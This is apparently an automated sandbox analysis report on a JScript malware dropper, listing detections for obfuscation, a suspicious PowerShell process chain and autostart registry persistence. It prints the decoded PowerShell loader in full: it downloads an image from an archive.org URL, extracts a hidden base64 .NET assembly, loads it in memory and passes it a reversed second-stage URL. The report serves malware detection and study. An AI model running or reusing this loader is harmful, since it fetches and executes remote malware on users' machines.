Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.1569282642.000001A8F1860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.1545150331.000001A8E9180000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ?", "0", "false");

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7?

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4AD900BD pushad ; iretd		2_2_00007FFB4AD900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFB4AD900BD pushad ; iretd		4_2_00007FFB4AD900C1

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\atrophiante.js

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
